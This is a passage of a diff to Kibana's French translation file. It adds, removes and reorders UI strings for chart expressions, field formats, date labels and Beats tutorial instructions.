Sinon, le contexte d'entrée est utilisé.", - "expressions.types.number.fromStringConversionErrorMessage": "Impossible de cataloguer la chaîne \"{string}\" en nombre", - "expressionShape.functions.progress.args.barColorHelpText": "La couleur de la barre d'arrière-plan.", - "expressionShape.functions.progress.args.barWeightHelpText": "L'épaisseur de la barre d'arrière-plan.", "expressionShape.functions.progress.args.fontHelpText": "Les propriétés de la police {CSS} pour l'étiquette. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", "expressionShape.functions.progress.args.labelHelpText": "Pour afficher ou masquer l'étiquette, utilisez {BOOLEAN_TRUE} ou {BOOLEAN_FALSE}. Vous pouvez également spécifier une chaîne à afficher en tant qu'étiquette.", - "expressionShape.functions.progress.args.maxHelpText": "La valeur maximale de l'élément de progression.", "expressionShape.functions.progress.args.shapeHelpText": "Sélectionnez {list} ou {end}.", + "expressionShape.functions.progress.invalidMaxValueErrorMessage": "Valeur {arg} non valide : \"{max, number}\" ; \"{arg}\" doit être supérieur à 0.", + "expressionShape.functions.progress.invalidValueErrorMessage": "Valeur non valide : \"{value, number}\". 
La valeur doit être comprise entre 0 et {max, number}.", + "expressionShape.functions.shape.args.borderHelpText": "Une couleur {SVG} pour la bordure de la forme.", + "expressionShape.functions.shape.args.fillHelpText": "Une couleur {SVG} de remplissage de la forme.", + "expressionShape.functions.progress.args.barColorHelpText": "La couleur de la barre d'arrière-plan.", + "expressionShape.functions.progress.args.barWeightHelpText": "L'épaisseur de la barre d'arrière-plan.", + "expressionShape.functions.progress.args.maxHelpText": "La valeur maximale de l'élément de progression.", "expressionShape.functions.progress.args.valueColorHelpText": "La couleur de la barre de progression.", "expressionShape.functions.progress.args.valueWeightHelpText": "L'épaisseur de la barre de progression.", - "expressionShape.functions.progress.invalidMaxValueErrorMessage": "Valeur {arg} non valide : \"{max, number}\" ; \"{arg}\" doit être supérieur à 0.", - "expressionShape.functions.progress.invalidValueErrorMessage": "Valeur non valide : \"{value, number}\". La valeur doit être comprise entre 0 et {max, number}.", "expressionShape.functions.progressHelpText": "Configure un élément de progression.", - "expressionShape.functions.shape.args.borderHelpText": "Une couleur {SVG} pour la bordure de la forme.", "expressionShape.functions.shape.args.borderWidthHelpText": "L'épaisseur de la bordure.", - "expressionShape.functions.shape.args.fillHelpText": "Une couleur {SVG} de remplissage de la forme.", - "expressionShape.functions.shape.args.maintainAspectHelpText": "Conserver le rapport d'origine de la forme ?", + "expressionShape.functions.shape.args.maintainAspectHelpText": "Conserver le rapport d'origine de la forme ?", "expressionShape.functions.shape.args.shapeHelpText": "Choisissez une forme.", - "expressionShape.functions.shape.invalidShapeErrorMessage": "Valeur non valide : \"{shape}\". 
Cette forme n'existe pas.", + "expressionShape.functions.shape.invalidShapeErrorMessage": "Valeur non valide : \"{shape}\". Cette forme n'existe pas.", "expressionShape.functions.shapeHelpText": "Crée une forme.", "expressionShape.renderer.progress.displayName": "Progression", "expressionShape.renderer.progress.helpDescription": "Présenter une progression basique", "expressionShape.renderer.shape.displayName": "Forme", "expressionShape.renderer.shape.helpDescription": "Présenter une forme basique", - "expressionTagcloud.feedbackMessage.tooSmallContainerDescription": "Le conteneur est trop petit pour afficher l'ensemble du nuage. Les balises peuvent être rognées ou omises.", - "expressionTagcloud.feedbackMessage.truncatedTagsDescription": "Le nombre de balises a été tronqué pour éviter des temps de traçage trop longs.", - "expressionTagcloud.functions.tagcloud.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du nuage de balises", - "expressionTagcloud.functions.tagcloud.args.bucketHelpText": "configuration des dimensions de compartiment", - "expressionTagcloud.functions.tagcloud.args.maxFontSizeHelpText": "Taille maximale de la police", - "expressionTagcloud.functions.tagcloud.args.metricHelpText": "configuration des dimensions d’indicateur", - "expressionTagcloud.functions.tagcloud.args.minFontSizeHelpText": "Taille minimale de la police", - "expressionTagcloud.functions.tagcloud.args.orientationHelpText": "Orientation des mots dans le nuage de balises", - "expressionTagcloud.functions.tagcloud.args.paletteHelpText": "Définit le nom de la palette du graphique.", - "expressionTagcloud.functions.tagcloud.args.scaleHelpText": "Échelle pour déterminer la taille de police d'un mot", - "expressionTagcloud.functions.tagcloud.args.showLabelHelpText": "Afficher l'étiquette du graphique", - "expressionTagcloud.functions.tagcloud.dimension.tags": "Balises", - "expressionTagcloud.functions.tagcloud.dimension.tagSize": "Taille de balise", - 
"expressionTagcloud.functions.tagcloud.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", - "expressionTagcloud.functions.tagcloud.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", - "expressionTagcloud.functions.tagcloudHelpText": "Visualisation du nuage de balises.", - "expressionTagcloud.renderer.tagcloud.displayName": "Visualisation du nuage de balises", - "expressionTagcloud.renderer.tagcloud.helpDescription": "Afficher le rendu d'un nuage de balises", + "expressionXY.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", "expressionXY.annotationLayer.annotations.help": "Annotations", - "expressionXY.annotationLayer.help": "Configurer un calque d'annotation dans le graphique xy", + "expressionXY.annotationLayer.help": "Configurer un calque d'annotation dans le graphique xy", + "expressionXY.annotationLayer.simpleView.help": "Afficher/masquer les détails", + "expressionXY.axisConfig.boundsMargin.help": "Marge des limites", + "expressionXY.axisConfig.extent.help": "Portée de l'axe", + "expressionXY.axisConfig.hide.help": "Masquer l’axe", + "expressionXY.axisConfig.labelColor.help": "Couleur des étiquettes de l'axe", + "expressionXY.axisConfig.labelsOrientation.help": "Spécifie l'orientation des étiquettes de l'axe", + "expressionXY.axisConfig.mode.help": "Mode échelle. 
Peut être normal, pourcentage, ondulé ou silhouette", + "expressionXY.axisConfig.position.help": "Position de l’axe", + "expressionXY.axisConfig.scaleType.help": "Le type d'échelle de l'axe", + "expressionXY.axisConfig.showDuplicates.help": "Afficher les coches dupliquées", + "expressionXY.axisConfig.showGridLines.help": "Spécifie si le quadrillage de l'axe est visible ou non", + "expressionXY.axisConfig.showLabels.help": "Afficher les étiquettes", + "expressionXY.axisConfig.showOverlappingLabels.help": "Afficher les étiquettes qui se chevauchent", + "expressionXY.axisConfig.showTitle.help": "Afficher le titre de l’axe", + "expressionXY.axisConfig.title.help": "Titre de l’axe", + "expressionXY.axisConfig.truncate.help": "Nombre de symboles avant troncature", "expressionXY.axisExtentConfig.extentMode.help": "Mode d'extension", - "expressionXY.axisExtentConfig.help": "Configurer les étendues d'axe du graphique xy", + "expressionXY.axisExtentConfig.help": "Configurer les étendues d'axe du graphique xy", "expressionXY.axisExtentConfig.lowerBound.help": "Limite inférieure", "expressionXY.axisExtentConfig.upperBound.help": "Limite supérieure", - "expressionXY.dataLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", - "expressionXY.dataLayer.help": "Configurer un calque dans le graphique xy", + "expressionXY.dataDecorationConfig.help": "Configurer la décoration des données", + "expressionXY.dataLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", + "expressionXY.dataLayer.decorations.help": "Décoration supplémentaire des données", + "expressionXY.dataLayer.help": "Configurer un calque dans le graphique xy", "expressionXY.dataLayer.isHistogram.help": "Disposer le graphique sous forme d'histogramme ou non", + "expressionXY.dataLayer.isHorizontal.help": "Le graphique est disposé horizontalement", + "expressionXY.dataLayer.isPercentage.help": "Mode de pourcentage ou non du graphique", + "expressionXY.dataLayer.isStacked.help": "Le graphique est disposé en 
mode empilé", "expressionXY.dataLayer.lineWidth.help": "Largeur de la ligne", "expressionXY.dataLayer.markSizeAccessor.help": "Accesseur de taille de marque", "expressionXY.dataLayer.palette.help": "Palette", "expressionXY.dataLayer.pointsRadius.help": "Rayon des points", "expressionXY.dataLayer.seriesType.help": "Type de graphique à afficher.", + "expressionXY.dataLayer.showLines.help": "Afficher des lignes entre les points", "expressionXY.dataLayer.showPoints.help": "Afficher les points", + "expressionXY.dataLayer.simpleView.help": "Afficher/masquer les détails", "expressionXY.dataLayer.splitAccessor.help": "Colonne selon laquelle effectuer la division", "expressionXY.dataLayer.xAccessor.help": "Axe X", - "expressionXY.dataLayer.xScaleType.help": "Type d'échelle de l'axe x", + "expressionXY.dataLayer.xScaleType.help": "Type d'échelle de l'axe x", + "expressionXY.decorationConfig.axisId.help": "ID de l’axe", + "expressionXY.decorationConfig.color.help": "La couleur des séries", + "expressionXY.decorationConfig.fill.help": "Remplir", + "expressionXY.decorationConfig.forAccessor.help": "l'accesseur auquel cette configuration s’applique", + "expressionXY.decorationConfig.icon.help": "Icône facultative utilisée pour les lignes de référence", + "expressionXY.decorationConfig.iconPosition.help": "Le placement de l'icône pour la ligne de référence", + "expressionXY.decorationConfig.lineStyle.help": "Le style de la ligne de référence", + "expressionXY.decorationConfig.lineWidth.help": "La largeur de la ligne de référence", + "expressionXY.decorationConfig.textVisibility.help": "Visibilité de l'étiquette sur la ligne de référence", "expressionXY.layer.columnToLabel.help": "Paires clé-valeur JSON de l'ID de colonne pour l'étiquette", "expressionXY.layeredXyVis.layers.help": "Calques de série visuelle", "expressionXY.layers.layerId.help": "ID du calque", "expressionXY.layers.table.help": "Tableau", "expressionXY.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", 
- "expressionXY.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", "expressionXY.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionXY.legendConfig.floatingColumns.help": "Spécifie le nombre de colonnes lorsque la légende est affichée à l'intérieur du graphique.", - "expressionXY.legendConfig.help": "Configurer la légende du graphique xy", + "expressionXY.legendConfig.help": "Configurer la légende du graphique xy", "expressionXY.legendConfig.horizontalAlignment.help": "Spécifie l'alignement horizontal de la légende lorsqu'elle est affichée à l'intérieur du graphique.", "expressionXY.legendConfig.isInside.help": "Spécifie si une légende se trouve à l'intérieur d'un graphique", "expressionXY.legendConfig.isVisible.help": "Spécifie si la légende est visible ou non.", 
@@ -3643,21 +2740,29 @@ "expressionXY.legendConfig.shouldTruncate.help": "Spécifie si les éléments de légende seront tronqués ou non", "expressionXY.legendConfig.showSingleSeries.help": "Spécifie si une légende comportant une seule entrée doit être affichée", "expressionXY.legendConfig.verticalAlignment.help": "Spécifie l'alignement vertical de la légende lorsqu'elle est affichée à l'intérieur du graphique.", + "expressionXY.partialData.bucketTooltipText": "La plage temporelle sélectionnée n'inclut pas ce compartiment en entier. Il se peut qu'elle contienne des données partielles.", + "expressionXY.referenceLine.axisId.help": "ID de l'axe auquel appartient la ligne de référence. Sa priorité est plus élevée que \"position\".", "expressionXY.referenceLine.name.help": "Nom de la ligne de référence", + "expressionXY.referenceLine.position.help": "Position de l'axe (premier axe de cette position) auquel appartient la ligne de référence.", "expressionXY.referenceLine.Value.help": "Valeur de la ligne de référence", - "expressionXY.referenceLineLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", - "expressionXY.referenceLineLayer.help": "Configurer une ligne de référence dans le graphique xy", + "expressionXY.referenceLineLayer.accessors.help": "Les colonnes à afficher sur l'axe y.", + "expressionXY.referenceLineLayer.decorationConfig.help": "Décoration supplémentaire de la ligne de référence", + "expressionXY.referenceLineLayer.help": "Configurer une ligne de référence dans le graphique xy", "expressionXY.reusable.function.axisExtentConfig.errors.emptyUpperBound": "La limite supérieure doit être supérieure à la limite inférieure, si le mode personnalisé est activé.", "expressionXY.reusable.function.dataLayer.errors.markSizeAccessorForNonLineOrAreaChartsError": "Impossible d'utiliser \"markSizeAccessor\". 
Les points sont appliqués uniquement pour les graphiques linéaires ou les graphiques en aires", "expressionXY.reusable.function.legendConfig.errors.alignmentUsageWithFalsyIsInsideError": "Les arguments \"horizontalAlignment\" et \"verticalAlignment\" ne sont pas appliqués si \"isInside = false\". Veuillez utiliser l'argument \"position\" à la place.", "expressionXY.reusable.function.legendConfig.errors.floatingColumnsWithFalsyIsInsideError": "Les arguments \"floatingColumns\" ne sont pas appliqués si \"isInside = false\".", "expressionXY.reusable.function.legendConfig.errors.legendSizeWithFalsyIsInsideError": "L'argument \"legendSize\" n'est pas appliqué si \"isInside = false\".", "expressionXY.reusable.function.legendConfig.errors.positionUsageWithIsInsideError": "L'argument \"position\" n'est pas appliqué si \"isInside = true\". Veuillez utiliser les arguments \"horizontalAlignment\" et \"verticalAlignment\" à la place.", + "expressionXY.reusable.function.xyVis.errors.axisIsNotAssignedError": "L'axe avec l'ID : \"{axisId}\" n'est assigné à aucun accesseur. Veuillez attribuer un axe en utilisant la construction suivante : `decorations=\\{dataDecorationConfig forAccessor=\"your-accessor\" axisId=\"{axisId}\"\\}`", "expressionXY.reusable.function.xyVis.errors.dataBoundsForNotLineChartError": "Seuls les graphiques linéaires peuvent être adaptés aux limites de données", - "expressionXY.reusable.function.xyVis.errors.extendBoundsAreInvalidError": "Pour les modes de graphiques en aires et à barres, et le mode d'extension personnalisée, la limite inférieure doit être inférieure ou supérieure à 0, et la limite supérieure doit être supérieure ou égale à 0", - "expressionXY.reusable.function.xyVis.errors.isInvalidIntervalError": "L'intervalle de l'axe X fourni n'est pas valide. L'intervalle doit inclure une quantité et des noms d'unité. 
Exemples : 1d, 24h, 1w.", + "expressionXY.reusable.function.xyVis.errors.extendBoundsAreInvalidError": "Pour les modes de graphiques en aires et à barres, et le mode d'extension personnalisée, la limite inférieure doit être inférieure ou supérieure à 0, et la limite supérieure doit être supérieure ou égale à 0", + "expressionXY.reusable.function.xyVis.errors.extentFullModeIsInvalid": "Pour la portée de l'axe x, le mode complet n'est pas pris en charge.", + "expressionXY.reusable.function.xyVis.errors.extentModeNotSupportedError": "La portée de l'axe x n'est prise en charge que pour les histogrammes numériques.", + "expressionXY.reusable.function.xyVis.errors.isInvalidIntervalError": "L'intervalle de l'axe X fourni n'est pas valide. L'intervalle doit inclure une quantité et des noms d'unité. Exemples : 1d, 24h, 1w.", + "expressionXY.reusable.function.xyVis.errors.linesVisibilityForNonLineChartError": "La visibilité des lignes ne peut être contrôlée que sur les graphiques linéaires.", "expressionXY.reusable.function.xyVis.errors.lineWidthForNonLineOrAreaChartError": "\"lineWidth\" peut être appliqué uniquement aux graphiques linéaires ou aux graphiques en aires", - "expressionXY.reusable.function.xyVis.errors.markSizeLimitsError": "Le rapport de taille de marque doit être supérieur ou égal à 1 et inférieur ou égal à 100", + "expressionXY.reusable.function.xyVis.errors.markSizeLimitsError": "Le rapport de taille de marque doit être supérieur ou égal à 1 et inférieur ou égal à 100", "expressionXY.reusable.function.xyVis.errors.markSizeRatioWithoutAccessor": "Le rapport de taille de marque peut être appliqué uniquement avec \"markSizeAccessor\"", "expressionXY.reusable.function.xyVis.errors.minTimeBarIntervalNotForTimeBarChartError": "L'argument \"minTimeBarInterval\" s'applique uniquement aux graphiques temporels à barres.", "expressionXY.reusable.function.xyVis.errors.notUsedFillOpacityError": "L'argument \"fillOpacity\" s'applique uniquement aux graphiques en 
aires.", @@ -3665,6 +2770,7 @@ "expressionXY.reusable.function.xyVis.errors.showPointsForNonLineOrAreaChartError": "\"showPoints\" peut être appliqué uniquement aux graphiques linéaires ou aux graphiques en aires", "expressionXY.reusable.function.xyVis.errors.timeMarkerForNotTimeChartsError": "Seuls les graphiques temporels peuvent avoir un repère de temps actuel", "expressionXY.reusable.function.xyVis.errors.valueLabelsForNotBarsOrHistogramBarsChartsError": "L'argument \"valueLabels\" s'applique uniquement aux graphiques à barres qui ne sont pas des histogrammes.", + "expressionXY.xAxisConfigFn.help": "Configurer la config de l'axe x du graphique xy", "expressionXY.xyChart.emptyXLabel": "(vide)", "expressionXY.xyChart.iconSelect.alertIconLabel": "Alerte", "expressionXY.xyChart.iconSelect.asteriskIconLabel": "Astérisque", @@ -3683,9 +2789,10 @@ "expressionXY.xyChart.iconSelect.triangleIconLabel": "Triangle", "expressionXY.xyVis.addTimeMaker.help": "Afficher le repère de temps", "expressionXY.xyVis.annotationLayer.help": "Calque d'annotation", - "expressionXY.xyVis.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", + "expressionXY.xyVis.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", "expressionXY.xyVis.curveType.help": "Définir de quelle façon le type de courbe est rendu pour un graphique linéaire", "expressionXY.xyVis.dataLayer.help": "Calque de données de série visuelle", + "expressionXY.xyVis.detailedTooltip.help": "Afficher l'infobulle détaillée", "expressionXY.xyVis.endValue.help": "Valeur de fin", "expressionXY.xyVis.fillOpacity.help": "Définir l'opacité du remplissage du graphique en aires", "expressionXY.xyVis.fittingFunction.help": "Définir le mode de traitement des valeurs manquantes", 
@@ -3696,35 +2803,41 @@ "expressionXY.xyVis.logDatatable.metric": "Axe vertical", "expressionXY.xyVis.logDatatable.x": "Axe horizontal", "expressionXY.xyVis.markSizeRatio.help": "Spécifie le rapport des points pour les graphiques linéaires et les graphiques en aires", + "expressionXY.xyVis.orderBucketsBySum.help": "Classer les groupes par somme", "expressionXY.xyVis.referenceLines.help": "Ligne de référence", - "expressionXY.xyVis.renderer.help": "Outil de rendu de graphique X/Y", - "expressionXY.xyVis.splitColumnAccessor.help": "Spécifie la colonne fractionnée du graphique xy", - "expressionXY.xyVis.splitRowAccessor.help": "Spécifie la ligne fractionnée du graphique xy", + "expressionXY.xyVis.renderer.help": "Outil de rendu de graphique X/Y", + "expressionXY.xyVis.showTooltip.help": "Afficher l'infobulle", + "expressionXY.xyVis.splitColumnAccessor.help": "Spécifie la colonne fractionnée du graphique xy", + "expressionXY.xyVis.splitRowAccessor.help": "Spécifie la ligne fractionnée du graphique xy", "expressionXY.xyVis.valueLabels.help": "Mode des étiquettes de valeur", "expressionXY.xyVis.valuesInLegend.help": "Afficher les valeurs dans la légende", + "expressionXY.xyVis.xAxisConfig.help": "Spécifie la configuration de l'axe x", "expressionXY.xyVis.xAxisInterval.help": "Spécifie l'intervalle minimal pour le graphique temporel à barres", - "fieldFormats.advancedSettings.format.bytesFormat.numeralFormatLinkText": "Format numérique", + "expressionXY.xyVis.yAxisConfigs.help": "Spécifie les configurations des axes y", + "expressionXY.yAxisConfigFn.help": "Configurer la config de l'axe y du graphique xy", "fieldFormats.advancedSettings.format.bytesFormatText": "{numeralFormatLink} par défaut pour le format \"octets\"", - "fieldFormats.advancedSettings.format.bytesFormatTitle": "Format octets", - "fieldFormats.advancedSettings.format.currencyFormat.numeralFormatLinkText": "Format numérique", "fieldFormats.advancedSettings.format.currencyFormatText": "{numeralFormatLink} 
par défaut pour le format \"devise\"", - "fieldFormats.advancedSettings.format.currencyFormatTitle": "Format devise", "fieldFormats.advancedSettings.format.defaultTypeMapText": "Mapping du nom du format à utiliser par défaut pour chaque type de champ. Le format {defaultFormat} est utilisé lorsque le type de champ n'est pas mentionné explicitement.", + "fieldFormats.advancedSettings.format.formattingLocaleText": "Paramètre régional {numeralLanguageLink}", + "fieldFormats.advancedSettings.format.numberFormatText": "{numeralFormatLink} par défaut pour le format \"nombre\"", + "fieldFormats.advancedSettings.format.percentFormatText": "{numeralFormatLink} par défaut pour le format \"pourcentage\"", + "fieldFormats.advancedSettings.format.bytesFormat.numeralFormatLinkText": "Format numérique", + "fieldFormats.advancedSettings.format.bytesFormatTitle": "Format octets", + "fieldFormats.advancedSettings.format.currencyFormat.numeralFormatLinkText": "Format numérique", + "fieldFormats.advancedSettings.format.currencyFormatTitle": "Format devise", "fieldFormats.advancedSettings.format.defaultTypeMapTitle": "Nom du format du type de champ", "fieldFormats.advancedSettings.format.formattingLocale.numeralLanguageLinkText": "Langage numérique", - "fieldFormats.advancedSettings.format.formattingLocaleText": "Paramètre régional {numeralLanguageLink}", "fieldFormats.advancedSettings.format.formattingLocaleTitle": "Paramètre régional de format", "fieldFormats.advancedSettings.format.numberFormat.numeralFormatLinkText": "Format numérique", - "fieldFormats.advancedSettings.format.numberFormatText": "{numeralFormatLink} par défaut pour le format \"nombre\"", - "fieldFormats.advancedSettings.format.numberFormatTitle": "Format nombre", + "fieldFormats.advancedSettings.format.numberFormatTitle": "Format de nombre", "fieldFormats.advancedSettings.format.percentFormat.numeralFormatLinkText": "Format numérique", - "fieldFormats.advancedSettings.format.percentFormatText": "{numeralFormatLink} 
par défaut pour le format \"pourcentage\"", "fieldFormats.advancedSettings.format.percentFormatTitle": "Format pourcentage", "fieldFormats.advancedSettings.shortenFieldsText": "Raccourcir les champs longs, par exemple f.b.baz plutôt que foo.bar.baz", "fieldFormats.advancedSettings.shortenFieldsTitle": "Raccourcir les champs", "fieldFormats.boolean.title": "Booléen", "fieldFormats.bytes.title": "Octets", "fieldFormats.color.title": "Couleur", + "fieldFormats.currency.title": "Devise", "fieldFormats.date_nanos.title": "Date nanos", "fieldFormats.date.title": "Date", "fieldFormats.duration.inputFormats.days": "Jours", @@ -3759,11 +2872,11 @@ "fieldFormats.duration.outputFormats.humanize.precise": "Lisible par l'humain (précis)", "fieldFormats.duration.title": "Durée", "fieldFormats.geoPoint.title": "Point géographique", - "fieldFormats.geoPoint.transformOptions.latLonString": "chaîne avec le format : \"lat,lon\"", + "fieldFormats.geoPoint.transformOptions.latLonString": "chaîne avec le format : \"lat,lon\"", "fieldFormats.geoPoint.transformOptions.none": "- Aucune -", "fieldFormats.geoPoint.transformOptions.wkt": "Texte bien connu", "fieldFormats.histogram.title": "Histogramme", - "fieldFormats.ip.title": "Adresse IP", + "fieldFormats.ip.title": "Adresse IP", "fieldFormats.number.title": "Nombre", "fieldFormats.percent.title": "Pourcentage", "fieldFormats.relative_date.title": "Date relative", 
@@ -3776,45 +2889,271 @@ "fieldFormats.string.transformOptions.short": "Points courts", "fieldFormats.string.transformOptions.title": "Initiale majuscule", "fieldFormats.string.transformOptions.upper": "Majuscule", - "fieldFormats.string.transformOptions.url": "Décodage paramètre URL", + "fieldFormats.string.transformOptions.url": "Décodage paramètre URL", "fieldFormats.truncated_string.title": "Chaîne tronquée", "fieldFormats.url.title": "Url", "fieldFormats.url.types.audio": "Audio", "fieldFormats.url.types.img": "Image", "fieldFormats.url.types.link": "Lien", - "flot.pie.unableToDrawLabelsInsideCanvasErrorMessage": "Impossible de dessiner un graphique avec les étiquettes contenues dans la toile", - "flot.time.aprLabel": "Avr", - "flot.time.augLabel": "Août", - "flot.time.decLabel": "Déc", - "flot.time.febLabel": "Févr", - "flot.time.friLabel": "Ven", - "flot.time.janLabel": "Jan", - "flot.time.julLabel": "Juil", - "flot.time.junLabel": "Juin", - "flot.time.marLabel": "Mars", - "flot.time.mayLabel": "Mai", - "flot.time.monLabel": "Lun", - "flot.time.novLabel": "Nov", - "flot.time.octLabel": "Oct", - "flot.time.satLabel": "Sam", - "flot.time.sepLabel": "Sept", - "flot.time.sunLabel": "Dim", - "flot.time.thuLabel": "Jeu", - "flot.time.tueLabel": "Mar", - "flot.time.wedLabel": "Mer", + "home.loadTutorials.requestFailedErrorMessage": "Échec de la requête avec le code de statut : {status}", + "home.tutorial.addDataToKibanaDescription": "En plus d'ajouter {integrationsLink}, vous pouvez essayer l'exemple de données ou charger vos propres données.", + "home.tutorial.noTutorialLabel": "Tutoriel {tutorialId} introuvable", + "home.tutorial.savedObject.addedLabel": "{savedObjectsLength} objets enregistrés ont bien été ajoutés.", + "home.tutorial.savedObject.installStatusLabel": "{overwriteErrorsLength} objets sur {savedObjectsLength} existent déjà. Cliquez sur \"Confirmer l'écrasement\" pour importer et écraser les objets existants. 
Toute modification apportée aux objets sera perdue.", + "home.tutorial.savedObject.requestFailedErrorMessage": "Échec de la requête. Erreur : {message}.", + "home.tutorial.savedObject.unableToAddErrorMessage": "Impossible d'ajouter {errorsLength} objets Kibana sur {savedObjectsLength} . Erreur : {errorMessage}.", + "home.tutorial.unexpectedStatusCheckStateErrorDescription": "État de vérification du statut {statusCheckState} inattendu", + "home.tutorial.unhandledInstructionTypeErrorDescription": "Type d'instructions {visibleInstructions} non pris en charge", + "home.tutorials.activemqLogs.longDescription": "Collectez les logs ActiveMQ avec Filebeat. [En savoir plus]({learnMoreLink}).", + "home.tutorials.activemqMetrics.longDescription": "Le module Metricbeat ''activemq'' récupère les indicateurs depuis les instances ActiveMQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.aerospikeMetrics.longDescription": "Le module Metricbeat ''aerospike'' récupère les indicateurs d'Aerospike. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheLogs.longDescription": "Le module Filebeat ''apache'' analyse les logs d'accès et d'erreurs créés par le serveur HTTP Apache. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheMetrics.longDescription": "Le module Metricbeat ''apache'' récupère les indicateurs depuis le serveur HTTP Apache 2. [En savoir plus]({learnMoreLink}).", + "home.tutorials.auditbeat.longDescription": "Utilisez Auditbeat pour collecter les données d'audit de vos hôtes. Ces données incluent les processus, utilisateurs, connexions, informations de socket, accès aux fichiers et bien plus encore. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.auditdLogs.longDescription": "Le module collecte et analyse les logs du démon d'audit (''auditd'') [En savoir plus]({learnMoreLink}).", + "home.tutorials.awsLogs.longDescription": "Collectez des logs AWS en les exportant vers un compartiment S3 configuré avec la notification SQS [En savoir plus]({learnMoreLink}).", + "home.tutorials.awsMetrics.longDescription": "Le module Metricbeat ''aws'' récupère les indicateurs depuis les API AWS et Cloudwatch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.azureLogs.longDescription": "Le module Filebeat ''azure'' collecte les logs d’activité et d’audit Azure. [Learn more]({learnMoreLink}).", + "home.tutorials.azureMetrics.longDescription": "Le module Metricbeat ''azure'' récupère les indicateurs de monitoring Azure. [En savoir plus]({learnMoreLink}).", + "home.tutorials.barracudaLogs.longDescription": "Ce module permet de recevoir les logs Barracuda Web Application Firewall par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", + "home.tutorials.bluecoatLogs.longDescription": "Ce module permet de recevoir les logs Blue Coat Director par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", + "home.tutorials.cefLogs.longDescription": "Ce module permet de recevoir des données Common Event Format (CEF) par le biais de Syslog. Lorsque des messages sont reçus par le biais du protocole Syslog, l'entrée Syslog analyse l'en-tête et définit la valeur d'horodatage. Puis le processeur est appliqué pour analyser les données CEF. Les données décodées sont alors écrites dans un champ objet ''cef''. Enfin, tous les champs Elastic Common Schema (ECS) ayant des correspondances CEF sont renseignés. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cephMetrics.longDescription": "Le module Metricbeat ''ceph'' récupère les indicateurs depuis Ceph. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.checkpointLogs.longDescription": "Il s'agit d'un module pour les logs de pare-feu Check Point. Il prend en charge les logs de l’exportateur de journaux au format Syslog. [Learn more]({learnMoreLink}).", + "home.tutorials.ciscoLogs.longDescription": "Il s'agit d'un module pour les logs de dispositifs réseau Cisco (ASA, FTD, IOS, Nexus). Il inclut les ensembles de fichiers suivants pour la réception des logs par le biais de Syslog ou d'un ficher. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cloudwatchLogs.longDescription": "Collectez les logs Cloudwatch en déployant Functionbeat à des fins d'exécution en tant que fonction AWS Lambda. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cockroachdbMetrics.longDescription": "Le module Metricbeat ''cockroachbd'' récupère les indicateurs depuis CockroachDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.common.auditbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.auditbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. 
Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. 
